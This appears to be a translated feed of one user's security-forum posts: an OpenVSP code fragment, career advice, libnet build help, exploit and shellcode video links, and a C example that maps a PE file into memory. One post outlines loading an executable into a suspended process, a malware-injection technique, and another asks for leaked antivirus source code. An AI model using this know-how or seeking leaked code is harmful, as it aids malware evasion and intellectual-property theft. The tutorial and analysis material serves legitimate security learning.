lcsfit_(&c__201, xt, yt, &c_true, "B", &c__1, &xtp, &ym, &ym, (ftnlen)1);
xo = xt[0];
xl[0] = xt[199];
tr = ym * 2.f / (xl[0] - xo);
rat = toc / tr;
sf = rat;
if (toc > e && (r__1 = rat - 1.f, dabs(r__1)) > 1e-4f && it <= 10) {
    goto L400;
}
```

Source: OpenVSP
-
If you're good, the field doesn't matter, you'll find work. It's harder at the beginning, but little by little you'll find something nice that you enjoy and that brings you substantial income. On the PHP side there is demand, but there are many people and you have to be good; Java is still in demand, but I don't know for how much longer; there aren't very many administrator positions, but I think they pay well; and C++, I think, will always be in demand. Have a look yourself on bestjobs/ejobs at what is wanted, search by the required experience and see what criteria each one asks for. You'll "lose" two days on this, but afterwards you'll know exactly what you have to do.
-
Hold on, let me look into the crystal ball to guess what the problem with your account is...
-
I think the binary version can be smaller than the size of the source. At Kaspersky I know there were several products, around 2007 or whenever a source had appeared, which I have too. But does anyone have source code from Norton or McAfee? Have you found it anywhere? If you find it, please post it here; there are people who are interested, I found interesting things in the Kaspersky code.

Edit: http://uk.reuters.com/article/2012/01/14/uk-symantec-hacker-idUKTRE80D09T20120114
-
I still have fans, even though I no longer have time to hand out bans and warnings like in my youth.
-
First read about the structure of executables:
Portable Executable - Wikipedia, the free encyclopedia
Peering Inside the PE: A Tour of the Win32 Portable Executable File Format
Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format
Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format, Part 2
Microsoft PE and COFF Specification
You could also look over: The .NET File Format - CodeProject®
The problem is that you want an example for .NET... I haven't really seen .NET examples; search the Programming section, you'll find many useful things, but fewer for .NET. A new process must be created (suspended). You allocate space and load the executable (at ImageBase, with the size specified by the OptionalHeader, i.e. SizeOfImage). But you have to be careful to load each section aligned to the size specified in the executable's structure, after you write the headers (the first thing you do). With that you've loaded it into memory; it's not extremely complicated. Then you just have to hand execution over to the EntryPoint. WinAPI gives you everything you need; you can do the same in .NET with DllImport, but there's no point. I don't know whether .NET has special classes and functions for this kind of thing; it should.
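As an added example, not code from the post above or from any of the linked articles: the mapping step described there (write the headers first, then place each section at its VirtualAddress inside a buffer of SizeOfImage bytes, leaving the gaps zero-filled) in C, run against a constructed minimal PE32 rather than a real file. Creating the suspended process and transferring control to the EntryPoint are Windows-specific and are left out; the sample PE's contents (ImageBase 0x400000, two sections, the bytes placed in them) are assumptions made for the example. The bounds checks are the part a real loader must not skip: a section header that points outside the file or outside the image is how a crafted PE turns a loader into an out-of-bounds write.

```c
/* Manual PE32 mapper (example code, not from the post): builds the in-memory
 * image the way a loader does: headers first, then each section at its RVA. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

typedef struct {
    uint8_t *image;                      /* SizeOfImage bytes, laid out as in memory */
    uint32_t size_of_image, image_base, entry_rva;
    uint16_t nsections;
} mapped_pe_t;

static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }
static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void wr16(uint8_t *p, uint16_t v) { memcpy(p, &v, 2); }
static void wr32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* Returns 0 on success, -1 if the file is malformed or truncated. Field offsets
 * follow the PE/COFF spec: IMAGE_FILE_HEADER after "PE\0\0", PE32 optional header after it. */
int map_pe32(const uint8_t *file, size_t len, mapped_pe_t *out)
{
    if (len < 64 || rd16(file) != 0x5A4D) return -1;                          /* "MZ" */
    uint32_t pe = rd32(file + 60);                                             /* e_lfanew */
    if (pe > len || len - pe < 24 || rd32(file + pe) != 0x00004550) return -1; /* "PE\0\0" */
    const uint8_t *fh = file + pe + 4;
    uint16_t nsec = rd16(fh + 2), opt_size = rd16(fh + 16);
    const uint8_t *opt = fh + 20;
    size_t hdr_end = (size_t)(opt - file) + opt_size + (size_t)nsec * 40;
    if (opt_size < 0x60 || hdr_end > len || rd16(opt) != 0x10B) return -1;    /* PE32 only here */
    uint32_t size_of_image = rd32(opt + 56), size_of_headers = rd32(opt + 60);
    if (size_of_headers < hdr_end || size_of_headers > len || size_of_headers > size_of_image) return -1;

    uint8_t *img = calloc(1, size_of_image);      /* zero fill: uninitialised data and alignment gaps */
    if (!img) return -1;
    memcpy(img, file, size_of_headers);            /* 1. headers first, as the post says */
    const uint8_t *sh = opt + opt_size;
    for (uint16_t i = 0; i < nsec; i++, sh += 40) { /* 2. each section at its VirtualAddress */
        uint32_t va = rd32(sh + 12), raw = rd32(sh + 16), ptr = rd32(sh + 20);
        if (va > size_of_image || raw > size_of_image - va || ptr > len || raw > len - ptr) {
            free(img);                             /* section would escape the image or the file */
            return -1;
        }
        memcpy(img + va, file + ptr, raw);
    }
    out->image = img; out->size_of_image = size_of_image; out->nsections = nsec;
    out->image_base = rd32(opt + 28); out->entry_rva = rd32(opt + 16);
    return 0;
}

/* Address the EntryPoint would have if the image were placed at ImageBase. */
uint32_t entry_va(const mapped_pe_t *m) { return m->image_base + m->entry_rva; }

/* Constructed sample (assumption for the example): PE32, .text at RVA 0x1000 and .data at
 * RVA 0x2000, FileAlignment 0x200, SectionAlignment 0x1000. Returns the file length. */
size_t build_sample_pe(uint8_t *buf, size_t cap)
{
    const size_t len = 0x600;
    if (cap < len) return 0;
    memset(buf, 0, len);
    wr16(buf, 0x5A4D); wr32(buf + 60, 0x40);                       /* MZ, e_lfanew = 0x40 */
    wr32(buf + 0x40, 0x00004550);                                  /* "PE\0\0" */
    uint8_t *fh = buf + 0x44;
    wr16(fh, 0x14C); wr16(fh + 2, 2); wr16(fh + 16, 0xE0); wr16(fh + 18, 0x102); /* i386, 2 sections */
    uint8_t *opt = fh + 20;
    wr16(opt, 0x10B); wr32(opt + 16, 0x1000); wr32(opt + 28, 0x400000);       /* PE32, entry, ImageBase */
    wr32(opt + 32, 0x1000); wr32(opt + 36, 0x200);                            /* section/file alignment */
    wr32(opt + 56, 0x3000); wr32(opt + 60, 0x200);                            /* SizeOfImage, SizeOfHeaders */
    uint8_t *sh = opt + 0xE0;
    memcpy(sh, ".text\0\0\0", 8); wr32(sh + 8, 2); wr32(sh + 12, 0x1000);
    wr32(sh + 16, 0x200); wr32(sh + 20, 0x200); wr32(sh + 36, 0x60000020);
    sh += 40;
    memcpy(sh, ".data\0\0\0", 8); wr32(sh + 8, 5); wr32(sh + 12, 0x2000);
    wr32(sh + 16, 0x200); wr32(sh + 20, 0x400); wr32(sh + 36, 0xC0000040);
    buf[0x200] = 0xCC; buf[0x201] = 0xC3;                          /* .text raw data: int3; ret */
    memcpy(buf + 0x400, "hello", 5);                               /* .data raw data */
    return len;
}

int main(void)
{
    uint8_t file[0x600]; mapped_pe_t m;
    size_t n = build_sample_pe(file, sizeof file);
    if (map_pe32(file, n, &m) != 0) { puts("malformed PE"); return 1; }
    printf("sections=%u SizeOfImage=0x%x entry=0x%08x byte at entry=0x%02x\n",
           m.nsections, m.size_of_image, entry_va(&m), m.image[m.entry_rva]);
    free(m.image);
    return 0;
}
```

The mapper copies SizeOfRawData bytes per section and relies on the zeroed buffer for the rest of VirtualSize, which is what the Windows loader does too; relocations and imports, which a real loader applies after this step, are not handled here.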
-
I think you installed libnet once before, and not libnet-dev.
root@bt:~/libnet-1.1.5# ./configure
And not:
root@bt:~/libnet-dev-1.1.5# ./configure
I don't know, it should work.
-
Did you read what I wrote? configure: error: libnet0 (dev) is required for this program
-
The problem is that you need the libnet development headers (that "dev" comes from "development"; libnet itself was probably already installed). I think this is it: libnet-dev | Free software downloads at SourceForge.net
-
Those are very well known; there are many other "commands"... Open the messenger executable in a hex editor and look around in there.
-
In many places it shows up because of this damn icon: http://mystatus.skype.com/smallicon/sample.skype90 We'll fix it in the next day or two.
-
How to get iTunes Apps / Movies / Albums / Music for free!
Nytro replied to The_Arhitect's topic in Tutoriale in engleza
You aren't able to read anything longer than 10 lines and give your opinion on it.
-
Intro To Exploits - Part 1 http://www.youtube.com/watch?v=NzGB-8Sntqc&feature=player_embedded Description: **This video and Part 2 Segment 1 are more lecture based videos** What's in this video? -Coding Practices -Defining Functions of Interest -Introduction To Shellcode I recommend watching in full-screen due to quality issues. This is part 1 of 5. More to come over the next few weeks. Also, sorry about how I was talking in the video, I'm not a strong speaker. Source: Intro To Exploits - Part 1
Intro To Exploits - Part 2 (Shellcode) http://www.youtube.com/watch?v=-QlaRVn1K1o&feature=player_embedded Description: I recommend watching in full-screen due to quality issues. This is the first of two videos for part 2 of 5. The topic of discussion for this video is an expanded explanation of shellcode. -How shellcode is executed -Architecture types -Assembly/hex examples Also, sorry about how I was talking in the video, I'm not a strong speaker. Source: Intro To Exploits - Part 2 (Shellcode)
Intro To Exploits - Part 2 (Shellcode Cont.) http://www.youtube.com/watch?v=m-AxrZxvu8o&feature=player_embedded Description: ****This video demonstrates the concepts of how shellcode works**** I recommend watching in full-screen due to quality issues. This is the second of two videos for part 2 of 5. This video expands even more on the previous video, and we end Part 2 with a visual example of how shellcode operates. -Different purposes of shellcode -Security evasion -Visual example of shellcode in action (bind and reverse shells) Source: Intro To Exploits - Part 2 (Shellcode Cont.)
Intro To Exploits - Part 3 (Fuzzing) http://www.youtube.com/watch?v=v3wOMXZykrE&feature=player_embedded Description: The topic of this video is fuzzing. At the end of Part 3, we fuzz a simple tcp echo server. -Types of Fuzzers -How to know if a fuzzer was successful -Finding buffer size I hope you learned a lot, as fuzzing is very undocumented outside of the security industry, and the technique itself is more used for auditing many programs with a generic testing tool. The downside of fuzzing is that it is very limited in what it can test, and how deep into a program it can test. Fuzzing is more of an entry point stress test than it would be full-on code auditing. Source: Intro To Exploits - Part 3 (Fuzzing)
Intro To Exploits - Part 4 (Reverse Engineering) http://www.youtube.com/watch?v=kMWc1PiKWUQ&feature=player_embedded Description: ****Topic for the video is Reverse Engineering**** This video covers the basics of disassembling/reverse engineering. This is a great video, as I show you how to explore different functions within gdb. This is an awesome tactic for determining what a program might be able to do. -Exploring the CPU -Differentiating functions from other stack procedures -Finding functions and disassembling them -Finding return addresses Reverse Engineering is a very broad category, and in its own right deserves its own video series. The steps I go through in this video are more for mapping out a program, rather than editing asm code to change execution flow. Sorry for the pause half way through the video. I rage-quit half way through filming it. Source: Intro To Exploits - Part 4 (Reverse Engineering)
Intro To Exploits - Part 5 (Scenario) http://www.youtube.com/watch?v=5iUaq_H6wf8&feature=player_embedded Description: ***This video is intended for learning purposes only. In no way, shape, or form, is the sole purpose of this video intended as a solution to the IO wargame.*** What's in this video? In this video, we put together all of the information we have learned from the previous videos, and apply it to a practical (but very unlikely) buffer overflow situation. -On the fly exploitation (IO smashthestack level 5) Source: Intro To Exploits - Part 5 (Scenario)
[h=4]Intro To Exploits - Part 5 (Scenario Cont.)[/h] http://www.youtube.com/watch?v=NzD67lD9OQU&feature=player_embedded Description: ***This video is intended for learning purposes only. In no way, shape, or form, is the sole purpose of this video intended to be used as a solution to the IO wargame.*** This video concludes the previous video, and the series. I hope I have helped new people learn a lot, and refreshed the memories of the more seasoned folks. Thank you for watching! Source: http://www.securitytube.net/video/2649
-
[h=4]Cracking Hashes From A Meterpreter Session With Hashcat[/h] Description: Cracking Hashes From a Meterpreter Session with Hashcat, FOLLOW @sL0ps Source: Cracking Hashes From A Meterpreter Session With Hashcat
-
[h=4]Shellcode2Exe Shellcode Analysis[/h] http://www.youtube.com/watch?v=FTDZyYt7Fqk&feature=player_embedded Description: Converting shellcode into an executable is a simple analysis technique that allows you to use your favorite debugger to analyze the code at run time. This video describes the input and output formats supported by the Shellcode2Exe tool. Source: Shellcode2Exe Shellcode Analysis
-
[h=4]Scdbg - Shellcode Analysis[/h] Description: This video covers basic use of the scdbg tool to analyze several types of shellcode. scdbg is a tool written around the libemu library which runs shellcode in an emulated environment and displays all of the Windows API calls made during execution. scdbg also includes an integrated debug shell and complex options such as a report mode which tells you intimate details about how the shellcode was constructed. scdbg is open source and freely available. Versions are available for both Windows and Linux. Homepage: RE Corner Source: Scdbg - Shellcode Analysis